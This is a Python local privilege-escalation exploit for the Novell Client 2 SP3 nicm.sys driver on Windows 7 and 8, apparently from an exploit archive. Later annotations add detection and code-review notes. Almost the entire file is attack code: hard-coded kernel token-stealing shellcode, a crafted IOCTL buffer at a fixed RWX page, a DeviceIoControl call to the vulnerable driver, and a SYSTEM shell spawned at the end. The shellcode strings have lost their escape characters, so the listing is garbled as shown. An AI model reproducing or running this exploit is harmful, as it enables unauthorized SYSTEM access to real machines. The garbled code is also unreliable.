
# Title : Novell Client 2 SP3 Privilege Escalation Exploit
# Published : 2013-07-29
# Author :
# Previous Title : MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
# Next Title : Super Player 3500 (.m3u) - Local Stack Based Buffer Overflow


# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)

# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure whether there was anything else public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/

from ctypes import *
import sys,struct,os
from optparse import OptionParser

kernel32 = windll.kernel32
ntdll    = windll.ntdll

if __name__ == '__main__':
     # Entry point of the listing. Flow as shown: parse the target-OS flag,
     # select a set of hard-coded per-OS kernel structure offsets, assemble an
     # IOCTL input buffer around the fixed user-mode address 0x0d0d0000, map
     # that page read/write/execute in the current process, and issue a single
     # DeviceIoControl to the nicm device before spawning a shell.
     #
     # Defender notes:
     #  - Detection: a user-mode process that opens the nicm device and sends
     #    IOCTL 0x00143B6B, shortly after allocating an RWX page at a fixed low
     #    address and writing into its own process, is a distinctive sequence
     #    for endpoint telemetry; the cmd.exe child spawned at the end gives a
     #    parent/child relationship to alert on as well.
     #  - Mitigation: the header states the technique does not bypass SMEP on
     #    Windows 8; the only driver build named as tested is nicm.sys 3.1.11.0
     #    on x86 Windows 7 / 8.
     #
     # NOTE(review): escape sequences and line continuations appear to have
     # been lost in this reproduction, so the listing does not run as shown.

     # Target selection: only WIN7 / WIN8 are accepted (case-insensitive);
     # anything else prints usage and exits with status 0, not an error code.
     usage =  "%prog -o <target>"
     parser = OptionParser(usage=usage)
     parser.add_option("-o", type="string",
                  action="store", dest="target_os",
                  help="Available target operating systems: WIN7, WIN8")
     (options, args) = parser.parse_args()
     OS = options.target_os
     if not OS or OS.upper() not in ['WIN7','WIN8']:
           parser.print_help()
           sys.exit()
     OS = OS.upper()

     if OS == "WIN7":
		# Per-build process-structure field offsets (the variable names say
		# which field each one addresses). Nothing verifies that the running
		# kernel actually matches this layout.
		# NOTE(review): a mismatch would most likely fault in kernel mode
		# (system crash) rather than fail cleanly — presumably why the header
		# restricts the tested builds so narrowly.
		_KPROCESS = "x50" # Offset for Win7
		_TOKEN    = "xf8" # Offset for Win7
		_UPID     = "xb4" # Offset for Win7
		_APLINKS  = "xb8" # Offset for Win7
		
		# Kernel-mode stub assembled from the offsets above; its bytes are
		# fixed for the chosen OS and are used verbatim in the IOCTL buffer.
		steal_token =  "x52"                                 +
                 "x53"                                 +
                 "x33xc0"                             +
                 "x64x8bx80x24x01x00x00"         +
                 "x8bx40" + _KPROCESS                 +
                 "x8bxc8"                             +
                 "x8bx98" + _TOKEN + "x00x00x00"   +
                 "x89x1dx00x09x02x00"             +
                 "x8bx80" + _APLINKS + "x00x00x00" +
                 "x81xe8" + _APLINKS + "x00x00x00" +
                 "x81xb8" + _UPID + "x00x00x00x04x00x00x00" +
                 "x75xe8"                             +
                 "x8bx90" + _TOKEN + "x00x00x00"   +
                 "x8bxc1"                             +
                 "x89x90" + _TOKEN + "x00x00x00"   +
                 "x5b"                                 +
                 "x5a"                                 +
                 "xc2x08"

		sc = steal_token	
		
     else: 
		# Same structure as the WIN7 branch with the Windows 8 offsets; the
		# only other difference is the shape of the stub below. See the
		# NOTE(review) on the WIN7 branch about unverified offsets.
		_KPROCESS = "x80" # Offset for Win8
		_TOKEN    = "xEC" # Offset for Win8
		_UPID     = "xB4" # Offset for Win8
		_APLINKS  = "xB8" # Offset for Win8

		# Kernel-mode stub for Windows 8, built from the offsets above.
		steal_token =  "x52"                                 +
                 "x53"                                 +
                 "x33xc0"                             +
                 "x64x8bx80x24x01x00x00"         +
                 "x8bx80" + _KPROCESS + "x00x00x00"+
                 "x8bxc8"                             +
                 "x8bx98" + _TOKEN + "x00x00x00"   +
                 "x8bx80" + _APLINKS + "x00x00x00" +
                 "x81xe8" + _APLINKS + "x00x00x00" +
                 "x81xb8" + _UPID + "x00x00x00x04x00x00x00" +
                 "x75xe8"                             +
                 "x8bx90" + _TOKEN + "x00x00x00"   +
                 "x8bxc1"                             +
                 "x89x90" + _TOKEN + "x00x00x00"   +
                 "x5b"                                 +
                 "x5a"                                 +
                 "xc2x08"

		sc = steal_token

	
     # IOCTL input buffer: a short run of 4-byte values followed by the stub.
     # The leading values appear to be addresses inside the 0x0d0d0000 page
     # that is mapped below, i.e. the buffer is self-referential and only
     # valid at that fixed base.
     kernel_sc = "x14x00x0dx0d"
     kernel_sc+= "x41x41x41x41"
     kernel_sc+= "x41x41x41x41"
     kernel_sc+= "x41x41x41x41"
     kernel_sc+= "x41x41x41x41"
     kernel_sc+= "x18x00x0dx0d"
     kernel_sc+= "x41x41x41x41"
     kernel_sc+= "x41x41x41x41"
     kernel_sc+= "x41x41x41x41"
     kernel_sc+= "x28x00x0dx0d"
     kernel_sc+= sc
	
	
     print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
     print "[>] Finding the driver."
	
     # Win32 CreateFile access flags / disposition, spelled out as literals.
     GENERIC_READ = 0x80000000
     GENERIC_WRITE = 0x40000000
     OPEN_EXISTING = 0x3
     DEVICE = '\\.\nicm'
	
     # Opens the driver's device object. NOTE(review): CreateFileA reports
     # failure with INVALID_HANDLE_VALUE (-1); with ctypes' default int return
     # type that value is truthy, so the `if device_handler:` guard below never
     # skips the IOCTL when the open fails. The device open itself is the
     # first observable step of this sequence for monitoring purposes.
     device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
     EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
     retn = c_ulong()
    
     # The IOCTL input pointer is the raw fixed address (passed by value),
     # with 0x14 bytes declared as input and no output buffer at all.
     inut_buffer = 0x0d0d0000
     inut_size = 0x14
     output_buffer = 0x0
     output_size = 0x0

     # Requested base for the payload page; must agree with inut_buffer and
     # with the addresses embedded in kernel_sc above.
     baseadd    = c_int(0x0d0d0000)
        
     # MEMRES is MEM_COMMIT | MEM_RESERVE; PAGEEXE is PAGE_EXECUTE_READWRITE,
     # so the page is mapped RWX — itself a common telemetry trigger.
     MEMRES     = (0x1000 | 0x2000)
     PAGEEXE    = 0x00000040
     Zero_Bits   = c_int(0)
     RegionSize = c_int(0x1000)
     write    = c_int(0)

     print "[>] Allocating memory for our shellcode."
     # -1 is the current-process pseudo-handle. NOTE(review): dwStatus is an
     # NTSTATUS that is never checked; if the allocation fails (for example
     # because the fixed base is already in use) the write below targets
     # memory that was never mapped.
     dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
     print "[>] Writing the shellcode."
     # NOTE(review): copies 0x1000 bytes although kernel_sc is far shorter,
     # so this reads past the end of the Python string object; the return
     # value and the bytes-written count in `write` are also ignored.
     kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))

     if device_handler:
        print "[>] Sending IOCTL to the driver."
        # Detection point: DeviceIoControl on the nicm device with control
        # code 0x00143B6B. The result in dev_io / retn is not inspected.
        dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)

     print "[>] Dropping to a SYSTEM shell."
     # Spawns a persistent cmd.exe (/K) as a child of this process; the
     # message above states the expectation that it runs as SYSTEM. The
     # device handle is never closed.
     os.system("cmd.exe /K cd C:\windows\system32")